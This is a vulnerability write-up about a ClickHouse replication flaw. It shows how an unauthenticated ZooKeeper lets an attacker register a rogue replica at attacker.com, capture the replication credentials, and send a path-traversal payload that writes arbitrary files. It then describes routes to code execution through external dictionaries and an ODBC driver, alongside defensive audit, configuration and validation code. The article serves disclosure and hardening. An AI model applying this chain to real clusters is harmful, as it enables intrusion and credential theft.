Why should you lock your house properly?

This article tells the story of a specific vulnerability in the ClickHouse replication protocol, and also shows how the attack surface can be expanded.

ClickHouse is a column-oriented database for storing large volumes of data, most often deployed with more than one replica. Clustering and replication in ClickHouse are built on top of Apache ZooKeeper (ZK) and require write access to it.

The default ZK installation does not require authentication, so thousands of ZK servers used to configure Kafka, Hadoop and ClickHouse are publicly accessible.

To reduce your attack surface, you must configure authentication and authorization when installing ZooKeeper.

There are indeed some 0days based on Java deserialization, but let's simply assume that an attacker can read from and write to the ZooKeeper used for ClickHouse replication.

When configured in cluster mode, ClickHouse supports distributed DDL queries, which pass through ZK: the nodes for them are created under /clickhouse/task_queue/ddl.

For example, you create the node /clickhouse/task_queue/ddl/query-0001 with the contents:

version: 1
query: DROP TABLE xxx ON CLUSTER test;
hosts: ['host1:9000', 'host2:9000']

and after that the test table will be dropped on the cluster servers host1 and host2. Distributed DDL also supports running CREATE/ALTER/DROP queries.

Sounds scary? But where can an attacker obtain the server addresses?

ClickHouse replication works at the level of an individual table, so when a table is created in ZK, a server is specified that will be responsible for exchanging metadata with the replicas. For example, when executing the following query (ZK must be configured; chXX is the replica name, foobar is the table name):

CREATE TABLE foobar
(
    `action_id` UInt32 DEFAULT toUInt32(0),
    `status` String
)
ENGINE=ReplicatedMergeTree(
'/clickhouse/tables/01-01/foobar/', 'chXX')
ORDER BY action_id;

the columns and metadata nodes will be created.

Contents of /clickhouse/tables/01/foobar/replicas/chXX/hosts:

host: chXX-address
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http

Is it possible to pull data from this cluster? Yes, if the replication port (TCP/9009) on the server chXX-address is not closed by a firewall and authentication for replication is not configured. How can authentication be bypassed?

An attacker can create a new replica in ZK simply by copying the contents of /clickhouse/tables/01-01/foobar/replicas/chXX and changing the host value.

Contents of /clickhouse/tables/01-01/foobar/replicas/attacker/host:

host: attacker.com
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http

Then the other replicas must be told that there is a new block of data on the attacker's server which they need to fetch. For this, a node /clickhouse/tables/01-01/foobar/log/log-00000000XX is created in ZK (XX is a monotonically growing counter, which must be greater than the last one in the event log):

format version: 4
create_time: 2019-07-31 09:37:42
source replica: attacker
block_id: all_7192349136365807998_13893666115934954449
get
all_0_0_2

where source replica is the name of the attacker's replica created in the previous step, block_id is the data block identifier, and get is the "get block" command (the commands for the other operations are listed here).
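From a defender's side, the two node formats shown above (the per-replica host node and the log entries) are exactly what an audit of the replication metadata should inspect: a replica whose host nobody provisioned, and log entries that tell the cluster to fetch parts from it. The following script is an added example and is not code from the original article; it parses both formats and reports such entries. The node contents, the allowlist of known hosts and the second replica name chYY-address are constructed for the example; a real audit would read the nodes from ZooKeeper.

```python
"""Audit ZooKeeper replication metadata for replicas nobody provisioned.

Added example, not code from the original article. It parses the two
node formats shown above (the per-replica `host` node and the
`log/log-00000000XX` entries) and flags replicas whose host is outside
an allowlist, plus log entries that tell replicas to fetch parts from
such a replica. All node contents below are constructed samples; a real
audit would read them from ZooKeeper.
"""
from __future__ import annotations

from dataclasses import dataclass

# Replica hosts the operator actually provisioned (constructed allowlist).
KNOWN_HOSTS = {"chXX-address", "chYY-address"}

# Constructed sample: contents of .../replicas/<name>/host nodes.
REPLICA_NODES = {
    "chXX": ("host: chXX-address\nport: 9009\ntcp_port: 9000\n"
             "database: default\ntable: foobar\nscheme: http\n"),
    "attacker": ("host: attacker.com\nport: 9009\ntcp_port: 9000\n"
                 "database: default\ntable: foobar\nscheme: http\n"),
}

# Constructed sample: contents of .../log/log-00000000XX nodes.
LOG_ENTRIES = {
    "log-0000000041": ("format version: 4\ncreate_time: 2019-07-31 09:30:00\n"
                       "source replica: chXX\nblock_id: all_1_2\nget\nall_0_0_1\n"),
    "log-0000000042": ("format version: 4\ncreate_time: 2019-07-31 09:37:42\n"
                       "source replica: attacker\n"
                       "block_id: all_7192349136365807998_13893666115934954449\n"
                       "get\nall_0_0_2\n"),
}


@dataclass
class Finding:
    node: str    # ZK node the finding refers to
    reason: str  # human-readable explanation


def parse_kv_node(text: str) -> dict[str, str]:
    """Parse 'key: value' lines; the first colon separates key from value."""
    fields: dict[str, str] = {}
    for line in text.splitlines():
        if ":" in line:
            key, value = line.split(":", 1)
            fields[key.strip()] = value.strip()
    return fields


def parse_log_entry(text: str) -> dict[str, str]:
    """Parse a log entry: 'key: value' header lines, then the command and part name."""
    fields = parse_kv_node(text)
    bare = [line.strip() for line in text.splitlines()
            if line.strip() and ":" not in line]
    if len(bare) >= 1:
        fields["command"] = bare[0]
    if len(bare) >= 2:
        fields["part"] = bare[1]
    return fields


def audit(replica_nodes: dict[str, str], log_entries: dict[str, str],
          known_hosts: set[str]) -> list[Finding]:
    """Return findings for unknown replica hosts and log entries sourced from them."""
    findings: list[Finding] = []
    trusted: set[str] = set()
    for name, text in replica_nodes.items():
        host = parse_kv_node(text).get("host", "")
        if host in known_hosts:
            trusted.add(name)
        else:
            findings.append(Finding(f"replicas/{name}", f"unknown host {host!r}"))
    for name, text in log_entries.items():
        entry = parse_log_entry(text)
        src = entry.get("source replica", "")
        if src not in trusted:
            findings.append(Finding(
                f"log/{name}",
                f"{entry.get('command')} of {entry.get('part')} from untrusted replica {src!r}"))
    return findings


if __name__ == "__main__":
    for finding in audit(REPLICA_NODES, LOG_ENTRIES, KNOWN_HOSTS):
        print(finding.node, "->", finding.reason)
```

The check deliberately keys on the host value rather than the replica name: a rogue replica can be registered under any name, but it must point replicas at a host the attacker controls, and that host is what the allowlist catches. Running the audit periodically against the live ZK tree, together with ZK ACLs, gives detection where the page shows there was none.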

Next, each replica reads the new event from the log and connects to the server controlled by the attacker to fetch the data block (the replication protocol is binary and runs over HTTP). The server attacker.com will receive the request:

POST /?endpoint=DataPartsExchange:/clickhouse/tables/01-01/default/foobar/replicas/chXX&part=all_0_0_2&compress=false HTTP/1.1
Host: attacker.com
Authorization: XXX

where XXX is the credentials used for replication. In some cases this may be an account that also has access to data via the native ClickHouse protocol and the HTTP protocol. As you can see, the attack surface becomes very large because the ZooKeeper used for replication was left without authentication configured.
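The two settings that close this path on the ClickHouse side are an authenticated ZooKeeper session and a shared secret for the replica-to-replica HTTP exchange. The fragment below is an added configuration example, not from the article or the ClickHouse project; host names, user names and passwords are placeholders, the digest ACL that matches the identity line must be set on the znodes in ZooKeeper itself, and older releases use yandex instead of clickhouse as the root element.

```xml
<!-- Added example fragment for config.xml (placeholders, not a real deployment). -->
<clickhouse>
    <zookeeper>
        <node index="1">
            <host>zk1.example.internal</host>
            <port>2181</port>
        </node>
        <!-- digest credentials for the ZK session; the matching ACL must be
             applied to /clickhouse and its children on the ZooKeeper side -->
        <identity>clickhouse:CHANGE_ME_zk_password</identity>
    </zookeeper>

    <!-- shared secret every replica must present on the
         /?endpoint=DataPartsExchange... requests shown above -->
    <interserver_http_credentials>
        <user>interserver</user>
        <password>CHANGE_ME_interserver_password</password>
    </interserver_http_credentials>
</clickhouse>
```

As the article itself shows, the interserver credential is sent to whatever host the replica's host node names, so it only helps once writes to ZooKeeper are restricted; the ZK ACL is the primary control and the interserver secret is defence in depth against a replication port reachable from the network.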

Let's look at the function that receives a block of data from a replica. It is written with full confidence that all replicas are under proper control and that there is trust between them.

(image: replication processing code)

The function reads the number of files, then for each of them the name, size and contents, and writes them to the file system. It is worth describing separately how data is stored in the file system.

There are several subdirectories in /var/lib/clickhouse (the default storage directory from the configuration file):

flags - directory for writing flags, used for recovery after data loss;
tmp - directory for storing temporary files;
user_files - operations with files in queries are limited to this directory (INTO OUTFILE and others);
metadata - sql files with table descriptions;
preprocessed_config - processed configuration files derived from /etc/clickhouse-server;
data - the actual directory with the data itself; a separate subdirectory is simply created here for each database (for example /var/lib/clickhouse/data/default).

For each table, a subdirectory is created in the database directory. Depending on the engine type, each column is a separate file. For example, for the foobar table created by the attacker, the following files will be created:

action_id.bin
action_id.mrk2
checksums.txt
columns.txt
count.txt
primary.idx
status.bin
status.mrk2

When processing a data block, the replica expects to receive files with the same names and does not check them in any way.

The attentive reader has probably already noticed the unsafe concatenation of file_name in the WriteBufferFromFile call. Yes, this allows the attacker to write arbitrary contents to any file on the FS with the rights of the clickhouse user. To do this, the replica controlled by the attacker must return the following response to the request (line breaks added for readability):

\x01
\x00\x00\x00\x00\x00\x00\x00\x24
../../../../../../../../../tmp/pwned
\x12\x00\x00\x00\x00\x00\x00\x00
hellofromzookeeper

and after the concatenation with ../../../../../../../../../tmp/pwned, the file /tmp/pwned will be written with the contents hellofromzookeeper.
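The fix on the receiving side is to treat every file name from a replica as untrusted input: parse the payload with bounds checks, accept only a plain file name from the set the part is expected to contain, and confirm the resolved path stays inside the part directory before anything is written. The script below is an added example and is not ClickHouse's own code; its wire layout (one byte file count, then per file a little-endian u64 name length, the name, a little-endian u64 content length and the content) is an assumption based on the byte dump above, not the real DataPartsExchange encoding, and both payloads are constructed here.

```python
"""Validate file names received from a replica before writing them.

Added example, not ClickHouse's own code. The wire layout is an
assumption based on the byte dump above: one byte file count, then per
file a u64 little-endian name length, the name, a u64 little-endian
content length and the content. Both payloads below are constructed.
"""
from __future__ import annotations

import os
import struct
import tempfile

# File set a part of this table is expected to contain (from the listing above).
EXPECTED_FILES = {
    "action_id.bin", "action_id.mrk2", "checksums.txt", "columns.txt",
    "count.txt", "primary.idx", "status.bin", "status.mrk2",
}


def _read_u64(buf: bytes, pos: int) -> tuple[int, int]:
    if pos + 8 > len(buf):
        raise ValueError("truncated length field")
    return struct.unpack_from("<Q", buf, pos)[0], pos + 8


def parse_part_response(buf: bytes) -> list[tuple[str, bytes]]:
    """Parse the (assumed) payload into (file name, content) pairs, bounds-checked."""
    if not buf:
        raise ValueError("empty payload")
    count, pos = buf[0], 1
    files: list[tuple[str, bytes]] = []
    for _ in range(count):
        name_len, pos = _read_u64(buf, pos)
        if pos + name_len > len(buf):
            raise ValueError("truncated file name")
        name = buf[pos:pos + name_len].decode("utf-8")
        pos += name_len
        size, pos = _read_u64(buf, pos)
        if pos + size > len(buf):
            raise ValueError("truncated file content")
        files.append((name, buf[pos:pos + size]))
        pos += size
    return files


def is_safe_file_name(name: str, part_dir: str, expected=EXPECTED_FILES) -> bool:
    """True only for a plain file name, in the expected set, that stays inside part_dir."""
    if not name or name in (".", "..") or "/" in name or "\\" in name or "\x00" in name:
        return False
    if expected is not None and name not in expected:
        return False
    # Belt and braces: the resolved path must still be inside the part directory.
    root = os.path.realpath(part_dir)
    target = os.path.realpath(os.path.join(root, name))
    return target != root and os.path.commonpath([root, target]) == root


def write_part(buf: bytes, part_dir: str) -> list[str]:
    """Validate every name first, then write; returns the names written."""
    files = parse_part_response(buf)
    for name, _ in files:  # reject the whole part before touching the file system
        if not is_safe_file_name(name, part_dir):
            raise ValueError(f"rejected file name from replica: {name!r}")
    os.makedirs(part_dir, exist_ok=True)
    for name, content in files:
        with open(os.path.join(part_dir, name), "wb") as fh:
            fh.write(content)
    return [name for name, _ in files]


def encode_part_response(files: list[tuple[str, bytes]]) -> bytes:
    """Build a payload in the assumed layout (used only to construct the samples)."""
    out = bytes([len(files)])
    for name, content in files:
        encoded = name.encode("utf-8")
        out += struct.pack("<Q", len(encoded)) + encoded
        out += struct.pack("<Q", len(content)) + content
    return out


# Constructed samples: a benign part and the traversal payload from the article.
BENIGN = encode_part_response([("columns.txt", b"columns format version: 1\n"),
                               ("count.txt", b"0")])
MALICIOUS = encode_part_response([("../../../../../../../../../tmp/pwned",
                                   b"hellofromzookeeper")])


def demo() -> tuple[list[str], str]:
    """Run both samples against a throwaway part directory."""
    with tempfile.TemporaryDirectory() as tmp:
        part_dir = os.path.join(tmp, "data", "default", "foobar", "all_0_0_2")
        written = write_part(BENIGN, part_dir)
        try:
            write_part(MALICIOUS, part_dir)
            outcome = "not rejected"
        except ValueError as exc:
            outcome = str(exc)
        return written, outcome
```

Validation runs over the whole file list before the first write, so a part containing one bad name leaves nothing half-written on disk. The expected-name allowlist is the stronger of the two checks: the traversal string in the article fails the plain-name test already, but the allowlist also stops a replica from dropping an extra, validly named file such as a shared library into the part directory.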

There are several ways to turn the ability to write files into remote code execution (RCE).

External dictionaries to RCE

In old versions, the directory with the ClickHouse configuration was by default owned by the clickhouse user. Configuration files are XML files that the service reads at startup and then caches in /var/lib/clickhouse/preprocessed_configs; when they change, they are re-read. With write access to /etc/clickhouse-server, an attacker can create their own external dictionary of executable type and then execute arbitrary code. Current versions of ClickHouse do not grant these rights by default, but if the server was upgraded in place over time, the old permissions may remain. If you operate a ClickHouse cluster, check the permissions on the configuration directory: it must belong to the root user.

ODBC to CSY

When the package is installed, the clickhouse user is created, but its home directory, /nonexistent, is not. However, when using external dictionaries, or for other reasons, administrators create the /nonexistent directory and give the clickhouse user write access to it (SSZB! translator's note).

ClickHouse supports ODBC and can connect to other databases. In ODBC you can specify the path to the database driver library (.so). Old versions of ClickHouse allowed this directly in the query, but a stricter check of the connection string has since been added to odbc-bridge, so the driver path can no longer be specified from a query. But can an attacker write to the home directory using the vulnerability described above?

Let's create a file ~/.odbc.ini with the following contents:

[lalala]
Driver=/var/lib/clickhouse/user_files/test.so

then when SELECT * FROM odbc('DSN=lalala', 'test', 'test'); is executed, the library test.so will be loaded and we get RCE (thanks to buglloc for the idea).

These and other vulnerabilities were fixed in ClickHouse version 19.14.3. Take care of your ClickHouse and ZooKeepers!

Source: www.hab.com
